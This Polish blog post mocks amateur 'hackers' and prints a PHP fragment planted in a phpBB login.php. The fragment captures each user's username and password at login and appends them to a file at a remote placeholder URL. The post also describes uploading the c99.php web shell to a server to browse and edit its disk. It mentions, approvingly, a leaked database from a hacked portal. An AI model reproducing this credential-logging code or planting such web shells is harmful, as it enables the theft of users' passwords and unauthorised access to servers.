Hacking czy Lamerstwo ?

10c4ae5c5f05f3a0.jpg

“Sytuacja którą chce opisać jest dla mnie wielkim żalem że takie osoby istnieją w świecie internetu i są bezkarne . Bo jakim trzeba być bydlakiem żeby to robić..”

Żal mi tego kolesia -.-, w pliku login.php umieszczono mały fragment kodu, który zapisywał loginy i hasła do pliku *.txt po zalogowaniu ^^, a oto kawałek tego “perfidnego” kodu:


if( isset($HTTP_POST_VARS['login']) || isset($HTTP_GET_VARS['login']) || isset($HTTP_POST_VARS['logout']) || isset($HTTP_GET_VARS['logout']) )
{
if( ( isset($HTTP_POST_VARS['login']) || isset($HTTP_GET_VARS['login']) ) && (!$userdata['session_logged_in'] || isset($HTTP_POST_VARS['admin'])) )
{
$username = isset($HTTP_POST_VARS['username']) ? phpbb_clean_username($HTTP_POST_VARS['username']) : ”;
$password = isset($HTTP_POST_VARS['password']) ? $HTTP_POST_VARS['password'] : ”;
$fp = fopen(”http://link/plik.txt”,”a+”);
$dane = $username.”/”.$password.”/”.”;
fputs($fp, $dane);
fclose($fp);

I takim o to sposobem, mamy loginy i hasła użytkowników logujących się ^_^

c99.png

Następnym sposobem, aby mieć dostęp do ftp - ale nie mając hasł, wystarczy na dowolny server wgrać plik - c99.php, tym plikiem możemy po prostu sobie surfować po dysku bez prawie żadnych ograniczeń i je edytować xD…

smieszne_47.jpg

Jednak, warto oglądać telewizje która w łatwy sposób manipuluje ludem…

No cóż jednak ja, zostanę przy HBO i Canal + ;)

Idąc dalej śladem “hakierów, ostatnio jak wspomniałem we wcześniejszym wpisie, został “schakowany” portal “czarnego teamu”. Baza już wisi w necie ;) Waży niecałe 4Mb, ale można tam coś ciekawego znaleźć - więcej wkrótce …

Leave a Reply